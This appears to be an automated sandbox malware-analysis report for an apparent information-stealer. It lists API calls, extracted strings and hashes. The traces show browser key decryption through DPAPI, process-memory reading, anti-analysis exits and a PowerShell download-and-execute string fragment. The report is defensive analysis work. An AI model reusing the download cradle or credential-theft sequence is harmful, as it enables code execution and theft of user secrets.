                                            • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                            • String ID:
                                            • API String ID: 2311089104-0
                                            • Opcode ID: 7104a1ad71f7267fb3f92d709a770ba7d5c34dd003ba373b3d6e6f2e7190c7f7
                                            • Instruction ID: ed52a4b53b9c0591db71eabf51b59360b39b3b260bb7ca760b64e801f0f9a50e
                                            • Opcode Fuzzy Hash: 7104a1ad71f7267fb3f92d709a770ba7d5c34dd003ba373b3d6e6f2e7190c7f7
                                            • Instruction Fuzzy Hash: 02310778A00209EFDB14CF94C985BAEB7B5FF49350F108169E901A7390D778AD41CFA5
                                            APIs
                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 03029C53
                                            • GetFileSizeEx.KERNEL32(000000FF,?), ref: 03029C78
                                            • LocalAlloc.KERNEL32(00000040,?), ref: 03029C98
                                            • ReadFile.KERNEL32(000000FF,?,00000000,030216F6,00000000), ref: 03029CC1
                                            • LocalFree.KERNEL32(030216F6), ref: 03029CF7
                                            • CloseHandle.KERNEL32(000000FF), ref: 03029D01
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                            • String ID:
                                            • API String ID: 2311089104-0
                                            • Opcode ID: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                                            • Instruction ID: 2ba1c1fbfde637dfd87c97dc005e07742c794cb90e23f82cdf53eddfd1614a73
                                            • Opcode Fuzzy Hash: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                                            • Instruction Fuzzy Hash: 19311EB8A01209EFDB14CF94C885BEEBBF5FF49300F148158E915A7290C774AA51CFA1
                                            APIs
                                            • __getptd.LIBCMT ref: 0041C9EA
                                              • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                              • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                            • __amsg_exit.LIBCMT ref: 0041CA0A
                                            • __lock.LIBCMT ref: 0041CA1A
                                            • InterlockedDecrement.KERNEL32(?), ref: 0041CA37
                                            • free.MSVCRT ref: 0041CA4A
                                            • InterlockedIncrement.KERNEL32(0042B558), ref: 0041CA62
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                            • String ID:
                                            • API String ID: 634100517-0
                                            • Opcode ID: 89c3f3603ea426d8c1dcae7c91f98695ae5431033bc18fad3d55e9ead8607d02
                                            • Instruction ID: 84b4572ca590114782b091576b9a89d8360325c6110713fe167f1eb626e4287d
                                            • Opcode Fuzzy Hash: 89c3f3603ea426d8c1dcae7c91f98695ae5431033bc18fad3d55e9ead8607d02
                                            • Instruction Fuzzy Hash: 5801C431A817299BC722EB669C857DE77A0BF04794F01811BE81467390C72C69D2CBDD
                                            APIs
                                            • __getptd.LIBCMT ref: 0303CC51
                                              • Part of subcall function 0303C206: __getptd_noexit.LIBCMT ref: 0303C209
                                              • Part of subcall function 0303C206: __amsg_exit.LIBCMT ref: 0303C216
                                            • __amsg_exit.LIBCMT ref: 0303CC71
                                            • __lock.LIBCMT ref: 0303CC81
                                            • InterlockedDecrement.KERNEL32(?), ref: 0303CC9E
                                            • free.MSVCRT ref: 0303CCB1
                                            • InterlockedIncrement.KERNEL32(0042B980), ref: 0303CCC9
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                            • String ID:
                                            • API String ID: 634100517-0
                                            • Opcode ID: 5d7d5386ca12c030d3e9ef79b035ddd590771242ace2c96a8d9315f1b641efb0
                                            • Instruction ID: f8ac3b52f8c1c3e23891db684574609c7ca0fa6df83f559b9214e34eca35bb83
                                            • Opcode Fuzzy Hash: 5d7d5386ca12c030d3e9ef79b035ddd590771242ace2c96a8d9315f1b641efb0
                                            • Instruction Fuzzy Hash: C701ED35A03B24ABE720EB65984479DB3A8BB47B10F084216D814BB290CB246841DFD9
                                            APIs
                                            • strlen.MSVCRT ref: 00416F1F
                                            • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,0041719A,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000), ref: 00416F4D
                                              • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416BE1
                                              • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416C05
                                            • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C), ref: 00416F92
                                            • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041719A), ref: 004170B3
                                              • Part of subcall function 00416DE0: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00416DF8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: strlen$MemoryProcessQueryReadVirtual
                                            • String ID: @
                                            • API String ID: 2950663791-2766056989
                                            • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                            • Instruction ID: da6ee04ed372484ea639f8c5ae6d2cf8ded6d6947598eb42fecba3fc0a9bdd2e
                                            • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                            • Instruction Fuzzy Hash: 27511CB5E041099BDB04CF98D981AEFBBB5FF88304F108559F919A7340D738EA51CBA5
                                            APIs
                                            • strlen.MSVCRT ref: 03037186
                                            • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,03037401,00000000,00420BA8,00000000,00000000), ref: 030371B4
                                              • Part of subcall function 03036E37: strlen.MSVCRT ref: 03036E48
                                              • Part of subcall function 03036E37: strlen.MSVCRT ref: 03036E6C
                                            • VirtualQueryEx.KERNEL32(03037574,00000000,?,0000001C), ref: 030371F9
                                            • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,03037401), ref: 0303731A
                                              • Part of subcall function 03037047: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 0303705F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: strlen$MemoryProcessQueryReadVirtual
                                            • String ID: @
                                            • API String ID: 2950663791-2766056989
                                            • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                            • Instruction ID: 15647c88aa1961d23d0278aa3ffc7efd686f6fa848b1799cc700c0fbbc3a858b
                                            • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                            • Instruction Fuzzy Hash: DD5115B5E05109EFDB08CF99D981AEFB7BABF88700F048519F915A7240D734EA01CBA5
                                            APIs
                                            • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00406E2A), ref: 00406A19
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID: *n@$*n@
                                            • API String ID: 1029625771-193229609
                                            • Opcode ID: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                                            • Instruction ID: a280f62563b1b8af23ece619f3fba2aedbd92eaccb2561d1aa32790852693925
                                            • Opcode Fuzzy Hash: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                                            • Instruction Fuzzy Hash: DA71C874A00119DFCB04CF48C484BEAB7B2FB88315F158179E80AAF391D739AA91CB95
                                            APIs
                                            • lstrcat.KERNEL32(?,0064A30C), ref: 03034A42
                                              • Part of subcall function 03039047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 03039072
                                            • lstrcat.KERNEL32(?,00000000), ref: 03034A68
                                            • lstrcat.KERNEL32(?,?), ref: 03034A87
                                            • lstrcat.KERNEL32(?,?), ref: 03034A9B
                                            • lstrcat.KERNEL32(?,0064A284), ref: 03034AAE
                                            • lstrcat.KERNEL32(?,?), ref: 03034AC2
                                            • lstrcat.KERNEL32(?,0064A2C8), ref: 03034AD6
                                              • Part of subcall function 0303A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0303A9EF
                                              • Part of subcall function 03038FF7: GetFileAttributesA.KERNEL32(00000000,?,03021DBB,?,?,0042565C,?,?,00420E1F), ref: 03039006
                                              • Part of subcall function 030347D7: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 030347E7
                                              • Part of subcall function 030347D7: RtlAllocateHeap.NTDLL(00000000), ref: 030347EE
                                              • Part of subcall function 030347D7: wsprintfA.USER32 ref: 0303480D
                                              • Part of subcall function 030347D7: FindFirstFileA.KERNEL32(?,?), ref: 03034824
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                            • String ID:
                                            • API String ID: 2540262943-0
                                            • Opcode ID: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                                            • Instruction ID: d953d461b639567a61b2200cd15076abe20f67351859cc420e5fe20ba1c8e820
                                            • Opcode Fuzzy Hash: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                                            • Instruction Fuzzy Hash: 063162BAA403186BDB14FBF0CC84EE9737DAB99700F4445C9B3559A080DEB497898F95
                                            APIs
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                            • ShellExecuteEx.SHELL32(0000003C), ref: 00412D85
                                            Strings
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412D04
                                            • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412CC4
                                            • <, xrefs: 00412D39
                                            • ')", xrefs: 00412CB3
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                            • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            • API String ID: 3031569214-898575020
                                            • Opcode ID: be724a604eb788cc69cb88ea5721ac6dea3b77e10dbfd579f56e69c65ca0a354
                                            • Instruction ID: 8aa8f54ed0a99c91faffa02525c95fa844b6858a6ee3c68abfdd9097d7126834
                                            • Opcode Fuzzy Hash: be724a604eb788cc69cb88ea5721ac6dea3b77e10dbfd579f56e69c65ca0a354
                                            • Instruction Fuzzy Hash: 08410E71D112089ADB14FBA1C991FDDB774AF10314F50401EE016A7192DF786ADBCFA9
                                            APIs
                                            • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 030214A5
                                            • __aulldiv.LIBCMT ref: 030214BF
                                            • __aulldiv.LIBCMT ref: 030214CD
                                            • ExitProcess.KERNEL32 ref: 030214FB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                            • String ID: @
                                            • API String ID: 3404098578-2766056989
                                            • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                            • Instruction ID: edc2bdd8818be55d941b23abd12fa7770874da19350725767f04eb516589a2de
                                            • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                            • Instruction Fuzzy Hash: E001A9B0D52308FAEF14DBE0CC89B9DBBBCAB04705F248488E304BB6C0D7B496418B59
                                            APIs
                                            • memcmp.MSVCRT(?,00421264,00000003), ref: 0302A094
                                              • Part of subcall function 0303AA07: lstrcpy.KERNEL32(?,00000000), ref: 0303AA4D
                                              • Part of subcall function 03030CC7: memset.MSVCRT ref: 03030E83
                                              • Part of subcall function 03030CC7: lstrcat.KERNEL32(?,00000000), ref: 03030E9C
                                              • Part of subcall function 03030CC7: lstrcat.KERNEL32(?,00420D7C), ref: 03030EAE
                                              • Part of subcall function 03030CC7: lstrcat.KERNEL32(?,00000000), ref: 03030EC4
                                              • Part of subcall function 03030CC7: lstrcat.KERNEL32(?,00420D80), ref: 03030ED6
                                              • Part of subcall function 0303A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0303A9EF
                                            • memcmp.MSVCRT(?,00421114,00000003), ref: 0302A116
                                            • memset.MSVCRT ref: 0302A14F
                                            • LocalAlloc.KERNEL32(00000040,?), ref: 0302A1A8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                                            • String ID: @
                                            • API String ID: 1977917189-2766056989
                                            • Opcode ID: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                                            • Instruction ID: 7443e106e530970c2c3a80432e580516460f8082a986eb4f0493b63e2c712c07
                                            • Opcode Fuzzy Hash: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                                            • Instruction Fuzzy Hash: 32615A35B01358ABCB18EFA4CD85FEDBBB5AF86304F408118E90AAF590DF746A05CB41
                                            APIs
                                            • strtok_s.MSVCRT ref: 00410DB8
                                            • strtok_s.MSVCRT ref: 00410EFD
                                              • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,02E24D60,?,0042110C,?,00000000), ref: 0041A82B
                                              • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: strtok_s$lstrcpylstrlen
                                            • String ID:
                                            • API String ID: 348468850-0
                                            • Opcode ID: 157972442aab98f8943623bffcefb76fc7b802db09b007e8cca3bf4835712916
                                            • Instruction ID: a77fe6eef144f8be1650d890f93c6b8163d42d0b0f361fe6991083760d0b9acb
                                            • Opcode Fuzzy Hash: 157972442aab98f8943623bffcefb76fc7b802db09b007e8cca3bf4835712916
                                            • Instruction Fuzzy Hash: 91517FB4A40209EFCB08CF95D595AEE77B5FF44308F10805AE802AB351D774EAD1CB95
                                            APIs
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                              • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                              • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                              • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                              • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                              • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                              • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                              • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                            • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                                              • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                              • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                              • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                              • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                            • memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                              • Part of subcall function 00409B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                                              • Part of subcall function 00409B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                                              • Part of subcall function 00409B60: memcpy.MSVCRT(?,?,?), ref: 00409BC6
                                              • Part of subcall function 00409B60: LocalFree.KERNEL32(?), ref: 00409BD3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
                                            • String ID: $"encrypted_key":"$DPAPI
                                            • API String ID: 3731072634-738592651
                                            • Opcode ID: 68f47abcc5eb6623e645a076bb0a9bdec2c93405b0c0c50e63f4af5dcb573e5c
                                            • Instruction ID: 5ad523267ed72994677b79ea1d9dce7d7822fbf486e040e59600fa97cf483dfd
                                            • Opcode Fuzzy Hash: 68f47abcc5eb6623e645a076bb0a9bdec2c93405b0c0c50e63f4af5dcb573e5c
                                            • Instruction Fuzzy Hash: D53155B5D10109ABCB04EBE4DC85AEF77B8BF44304F14452AE915B7282E7389E04CBA5
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CodeInfoPageValidmemset
                                            • String ID:
                                            • API String ID: 703783727-0
                                            • Opcode ID: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                                            • Instruction ID: 4364865c56fc9e1eb27f991c1670011fb43da8c744972f59dc5467dd63a23526
                                            • Opcode Fuzzy Hash: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                                            • Instruction Fuzzy Hash: 0B31E234A062919EFB66CF74C8943B9BFE89B47314B0C85BAD882EF196C338C405C761
                                            APIs
                                            • GetSystemTime.KERNEL32(?), ref: 03036BD3
                                            • sscanf.NTDLL ref: 03036C00
                                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 03036C19
                                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 03036C27
                                            • ExitProcess.KERNEL32 ref: 03036C41
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Time$System$File$ExitProcesssscanf
                                            • String ID:
                                            • API String ID: 2533653975-0
                                            • Opcode ID: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                                            • Instruction ID: c130382a525493aaa5076105778e77a598f26e92e68383b160f9b0d1cf867f3e
                                            • Opcode Fuzzy Hash: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                                            • Instruction Fuzzy Hash: F621EAB5D1420CABCF08EFE4D9459EEB7BAFF49300F04852EE406A3250EB355604CB65
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E28,00000000,?), ref: 0041882F
                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E28,00000000,?), ref: 00418836
                                            • wsprintfA.USER32 ref: 00418850
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocProcesslstrcpywsprintf
                                            • String ID: F+t$%dx%d
                                            • API String ID: 2716131235-1693601885
                                            • Opcode ID: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                                            • Instruction ID: e741bf7ca2fc1d65a497d39fe48fe123552d5275a0b8a8093fc8d321cf3eb0b5
                                            • Opcode Fuzzy Hash: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                                            • Instruction Fuzzy Hash: 48217FB5A80208BFDB00DFD4DD49FAEBBB9FB49B00F104119F605A7280C779A900CBA5
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417E37
                                            • HeapAlloc.KERNEL32(00000000), ref: 00417E3E
                                            • RegOpenKeyExA.ADVAPI32(80000002,02DF5C40,00000000,00020119,?), ref: 00417E5E
                                            • RegQueryValueExA.ADVAPI32(?,02E29958,00000000,00000000,000000FF,000000FF), ref: 00417E7F
                                            • RegCloseKey.ADVAPI32(?), ref: 00417E92
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocCloseOpenProcessQueryValue
                                            • String ID:
                                            • API String ID: 3466090806-0
                                            • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                            • Instruction ID: f35b37edc560d93cca1bbeb044924e1a71a0ba88b9c12cde0d27c4035fcf8d53
                                            • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                            • Instruction Fuzzy Hash: 01114CB5A84205FFD710CFD4DD4AFBBBBB9EB09B10F10425AF605A7280D77858018BA6
                                            APIs
